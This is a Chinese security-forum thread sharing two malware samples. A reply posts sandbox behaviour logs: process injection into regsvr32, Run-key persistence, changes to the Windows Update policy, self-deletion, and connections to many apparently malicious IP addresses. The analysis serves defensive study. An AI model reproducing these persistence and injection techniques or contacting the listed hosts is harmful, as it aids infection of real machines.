收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 [2016.05.14]今日样本2个
123下一页
返回列表 发新帖
查看: 5854|回复: 24
收起左侧

[病毒样本] [2016.05.14]今日样本2个

  [复制链接]
学雷锋做人
头像被屏蔽
发表于 2016-5-14 17:27:10 | 显示全部楼层 |阅读模式
(密码:infected)

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

翼风Fly
发表于 2016-5-14 23:37:42 | 显示全部楼层
本帖最后由 翼风Fly 于 2016-5-15 00:55 编辑

样本2:
运行的时候自动崩溃退出了,囧


[mw_shl_code=sql,true]

2016-5-14 星期六 23:04:12    创建文件   
进程: c:\documents and settings\yfeng\桌面\缉毒卫队2个样本\[2]缉毒卫队.exe
目标: C:\Documents and Settings\YFeng\Local Settings\Temp\nsg7.tmp\System.dll
规则: [文件组]所有执行文件 -> [文件]*; *.dll

2016-5-14 星期六 23:04:22    创建文件   
进程: c:\documents and settings\yfeng\桌面\缉毒卫队2个样本\[2]缉毒卫队.exe
目标: C:\Documents and Settings\YFeng\Local Settings\Temp\HelpButton.dll
规则: [文件组]所有执行文件 -> [文件]*; *.dll

2016-5-14 星期六 23:04:23    创建新进程   
进程: c:\documents and settings\yfeng\桌面\缉毒卫队2个样本\[2]缉毒卫队.exe
目标: c:\documents and settings\yfeng\桌面\缉毒卫队2个样本\[2]缉毒卫队.exe
命令行: "C:\Documents and Settings\YFeng\桌面\缉毒卫队2个样本\[2]缉毒卫队.exe"


2016-5-14 星期六 23:04:33    创建新进程   
进程: c:\documents and settings\yfeng\桌面\缉毒卫队2个样本\[2]缉毒卫队.exe
目标: c:\windows\system32\dwwin.exe
命令行: C:\WINDOWS\system32\dwwin.exe -x -s 184


2016-5-14 星期六 23:04:34    挂起其他进程的线程   
进程: c:\windows\system32\dwwin.exe
目标: c:\documents and settings\yfeng\桌面\缉毒卫队2个样本\[2]缉毒卫队.exe


2016-5-14 星期六 23:07:21    创建新进程   
进程: c:\documents and settings\yfeng\桌面\缉毒卫队2个样本\[2]缉毒卫队.exe
目标: c:\windows\system32\drwtsn32.exe
命令行: C:\WINDOWS\system32\drwtsn32 -p 2292 -e 148 -g[/mw_shl_code]

样本2生成文件:


样本1:

运行后循环删除自身,下载并生成大量文件,并以系统更新的形式进行存放;似乎依赖PowerShell?XP虚拟机,肯定是不带PowerShell的。具体情况没仔细看。顺便一提,看了看下载的KB968930,确实是微软的补丁包:
http://www.microsoft.com/en-us/download/details.aspx?id=16818
内容为Windows PowerShell 2.0 和 Windows Remote Management (WinRM) 2.0:
https://support.microsoft.com/zh-cn/kb/968930
看着行为不少,但相当多都是PowerShell干的。。。

[mw_shl_code=shell,true]2016-5-14 星期六 23:46:47        c:\windows\explorer.exe        创建新进程        c:\documents and settings\yfeng\桌面\[1]缉毒卫队.exe        允许        [应用程序]*        命令行: "C:\Documents and Settings\YFeng\桌面\[1]缉毒卫队.exe"
2016-5-14 星期六 23:46:50        c:\documents and settings\yfeng\桌面\[1]缉毒卫队.exe        创建新进程        c:\windows\system32\regsvr32.exe        允许        [应用程序]*        命令行: regsvr32.exe
2016-5-14 星期六 23:46:52        c:\documents and settings\yfeng\桌面\[1]缉毒卫队.exe        修改其他进程的内存        c:\windows\system32\regsvr32.exe        允许        [应用程序]*        
2016-5-14 星期六 23:46:53        c:\documents and settings\yfeng\桌面\[1]缉毒卫队.exe        修改其他进程的线程        c:\windows\system32\regsvr32.exe        允许        [应用程序]*        
2016-5-14 星期六 23:46:54        c:\windows\system32\regsvr32.exe        创建新进程        c:\windows\system32\regsvr32.exe        允许        [应用程序]*        命令行: regsvr32.exe
2016-5-14 星期六 23:46:56        c:\windows\system32\regsvr32.exe        创建注册表项        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl        允许        [注册表组]IE浏览器设置 -> [注册表]HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\*        
2016-5-14 星期六 23:46:58        c:\windows\system32\regsvr32.exe        创建注册表项        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION        允许        [注册表组]IE浏览器设置 -> [注册表]HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\*        
2016-5-14 星期六 23:46:59        c:\windows\system32\regsvr32.exe        修改注册表值        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe        允许        [注册表组]IE浏览器设置 -> [注册表]HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\*        值: 0x000022b8(8888)
2016-5-14 星期六 23:47:00        c:\windows\system32\regsvr32.exe        修改注册表值        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe        允许        [注册表组]IE浏览器设置 -> [注册表]HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\*        值: 0x000022b8(8888)
2016-5-14 星期六 23:47:01        c:\windows\system32\regsvr32.exe        创建注册表项        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION        允许        [注册表组]IE浏览器设置 -> [注册表]HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\*        
2016-5-14 星期六 23:47:02        c:\windows\system32\regsvr32.exe        修改注册表值        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe        允许        [注册表组]IE浏览器设置 -> [注册表]HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\*        值: 0x000022b8(8888)
2016-5-14 星期六 23:47:04        c:\windows\system32\regsvr32.exe        修改注册表值        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe        允许        [注册表组]IE浏览器设置 -> [注册表]HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\*        值: 0x000022b8(8888)
2016-5-14 星期六 23:47:06        c:\windows\system32\regsvr32.exe        创建注册表项        HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate        允许        [注册表组]系统设置 -> [注册表]HKEY_LOCAL_MACHINE\SOFTWARE\Policies\*        
2016-5-14 星期六 23:47:07        c:\windows\system32\regsvr32.exe        创建新进程        c:\windows\system32\regsvr32.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\regsvr32.exe"
2016-5-14 星期六 23:47:08        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1062] ->  [185.117.72.90 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:09        c:\windows\system32\regsvr32.exe        修改注册表值        HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\DisableOSUpgrade        允许        [注册表组]系统设置 -> [注册表]HKEY_LOCAL_MACHINE\SOFTWARE\Policies\*        值: 0x00000001(1)
2016-5-14 星期六 23:47:10        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1064] ->  [216.28.232.174 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:11        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1063] ->  [154.7.220.18 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:12        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1065] ->  [160.186.2.131 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:12        c:\windows\system32\regsvr32.exe        创建注册表项        HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\OSUpgrade        允许        [注册表组]系统设置 -> [注册表]HKEY_LOCAL_MACHINE\SOFTWARE\Policies\*        
2016-5-14 星期六 23:47:13        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1066] ->  [103.86.152.12 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:14        c:\windows\system32\regsvr32.exe        修改注册表值        HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\OSUpgrade\ReservationsAllowed        允许        [注册表组]系统设置 -> [注册表]HKEY_LOCAL_MACHINE\SOFTWARE\Policies\*        值: 0x00000000(0)
2016-5-14 星期六 23:47:16        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1067] ->  [26.146.1.70 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:17        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1068] ->  [27.217.19.93 : 8080]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:17        c:\windows\system32\regsvr32.exe        创建文件        C:\Documents and Settings\YFeng\Local Settings\Application Data\ysypur\ysypur.exe        允许        [文件组]所有执行文件 -> [文件]*; *.exe        
2016-5-14 星期六 23:47:18        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1070] ->  [191.239.213.197 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:19        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1071] ->  [119.131.67.186 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:20        c:\windows\system32\regsvr32.exe        修改注册表值        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\        允许        [注册表组]自动运行程序所在位置 -> [注册表]HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\*        值: "c:\documents and settings\yfeng\local settings\application data\ysypur\ysypur.exe"
2016-5-14 星期六 23:47:21        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1072] ->  [162.142.132.242 : 8080]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:21        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1073] ->  [243.200.49.35 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:22        c:\windows\system32\regsvr32.exe        修改注册表值        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\        允许        [注册表组]自动运行程序所在位置 -> [注册表]HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\*        值: "c:\documents and settings\yfeng\local settings\application data\ysypur\ysypur.exe"
2016-5-14 星期六 23:47:23        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1074] ->  [73.12.98.40 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:24        c:\windows\system32\ctfmon.exe        删除注册表值        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\internat.exe        允许        [注册表组]自动运行程序所在位置 -> [注册表]HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\*        
2016-5-14 星期六 23:47:26        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1075] ->  [252.49.48.98 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:27        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1076] ->  [208.177.215.133 : 443 (https)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:28        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1078] ->  [223.72.35.217 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:32        c:\windows\system32\regsvr32.exe        删除文件        C:\Documents and Settings\YFeng\桌面\[1]缉毒卫队.exe        阻止        [文件组]所有执行文件 -> [文件]*; *.exe        
2016-5-14 星期六 23:47:35        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1079] ->  [204.2.180.6 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:36        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1080] ->  [158.223.29.242 : 8080]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:36        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1081] ->  [152.213.173.194 : 8080]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:38        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1082] ->  [56.96.130.56 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:39        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1083] ->  [41.201.106.54 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:39        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1084] ->  [67.222.70.221 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:40        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1085] ->  [157.1.161.223 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:42        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1086] ->  [123.157.65.207 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:43        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1087] ->  [36.77.112.203 : 443 (https)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:43        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1088] ->  [156.49.84.251 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:45        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1089] ->  [244.80.39.222 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:46        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1090] ->  [118.104.26.242 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:46        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1091] ->  [38.243.89.225 : 443 (https)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:47        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1092] ->  [169.200.201.86 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:48        c:\windows\system32\regsvr32.exe        删除文件        C:\Documents and Settings\YFeng\桌面\[1]缉毒卫队.exe        允许        [文件组]所有执行文件 -> [文件]*; *.exe        
2016-5-14 星期六 23:47:49        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1093] ->  [34.182.139.173 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:49        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1094] ->  [35.79.148.166 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:50        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1095] ->  [209.139.32.59 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:52        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1096] ->  [139.252.188.67 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:52        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1097] ->  [217.1.183.140 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:53        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1098] ->  [79.137.147.158 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:57        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1099] ->  [58.87.149.163 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:47:58        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1100] ->  [121.164.184.202 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:48:00        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1102] ->  [192.253.96.228 : 443 (https)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:48:00        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1103] ->  [44.65.252.177 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:48:01        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1104] ->  [151.116.211.237 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:48:03        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1105] ->  [26.37.232.131 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:48:03        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1106] ->  [212.229.115.78 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:48:04        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1107] ->  [45.219.19.42 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:48:06        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1108] ->  [64.103.125.203 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:48:07        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1109 (kpop)] ->  [132.31.35.188 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:48:07        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1110] ->  [167.245.252.114 : 8080]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:48:08        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1111] ->  [236.112.172.159 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:48:10        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1112] ->  [213.228.10.168 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:48:11        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1113] ->  [70.20.188.77 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:48:13        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1114] ->  [199.109.49.170 : 443 (https)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:48:14        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1115] ->  [96.88.52.226 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:48:15        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1116] ->  [151.184.91.220 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:48:16        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1117] ->  [168.43.8.66 : 8080]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:48:17        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1118] ->  [155.239.60.223 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:48:17        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1119] ->  [54.212.207.115 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:48:18        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1120] ->  [80.190.99.67 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:48:19        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1121] ->  [116.138.54.249 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:48:28        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1122] ->  [40.65.191.82 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:48:28        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1123] ->  [187.252.12.20 : 80 (http)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:48:38        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1139] ->  [19.153.228.69 : 443 (https)]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:48:41        c:\windows\system32\regsvr32.exe        访问网络        TCP [本机 : 1143] ->  [196.224.79.199 : 8080]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        
2016-5-14 星期六 23:50:50        c:\windows\system32\regsvr32.exe        创建新进程        c:\windows\system32\regsvr32.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\regsvr32.exe"
2016-5-14 星期六 23:50:52        c:\windows\system32\regsvr32.exe        创建文件        C:\Documents and Settings\YFeng\Local Settings\Temporary Internet Files\Content.IE5\02JLUDMN\WindowsXP-KB968930-x86-ENG[1].exe        允许        [文件组]所有执行文件 -> [文件]*; *.exe        
2016-5-14 星期六 23:51:35        c:\windows\system32\regsvr32.exe        创建文件        C:\Documents and Settings\YFeng\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe        允许        [文件组]所有执行文件 -> [文件]*; *.exe        
2016-5-14 星期六 23:51:35        c:\windows\system32\regsvr32.exe        创建新进程        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        允许        [应用程序]*        命令行: "C:\DOCUME~1\YFeng\LOCALS~1\Temp\WindowsXP-KB968930-x86-ENG.exe" /quiet /norestart
2016-5-14 星期六 23:51:37        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\windowspowershellhelp.chm        允许        [文件组]所有执行文件 -> [文件]*; *.chm        
2016-5-14 星期六 23:51:37        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\winrm.cmd        允许        [文件组]所有执行文件 -> [文件]*; *.cmd        
2016-5-14 星期六 23:51:38        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\compiledcomposition.microsoft.powershell.gpowershell.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:38        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\microsoft.backgroundintelligenttransfer.management.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:38        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\microsoft.backgroundintelligenttransfer.management.interop.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:39        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\microsoft.backgroundintelligenttransfer.management.resources.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:39        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\microsoft.powershell.commands.diagnostics.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:39        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\microsoft.powershell.commands.diagnostics.resources.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:39        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\microsoft.powershell.commands.management.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:40        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\microsoft.powershell.commands.management.resources.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:40        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\microsoft.powershell.commands.utility.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:40        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\microsoft.powershell.commands.utility.resources.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:40        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\microsoft.powershell.consolehost.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:41        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\microsoft.powershell.consolehost.resources.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:41        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\microsoft.powershell.editor.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:41        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\microsoft.powershell.editor.resources.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:41        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\microsoft.powershell.gpowershell.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:42        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\microsoft.powershell.gpowershell.resources.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:42        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\microsoft.powershell.graphicalhost.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:42        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\microsoft.powershell.graphicalhost.resources.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
2016-5-14 星期六 23:51:42        c:\documents and settings\yfeng\local settings\temp\windowsxp-kb968930-x86-eng.exe        创建文件        C:\02dbcaae2af0f0c0a87287\microsoft.powershell.security.dll        允许        [文件组]所有执行文件 -> [文件]*; *.dll        
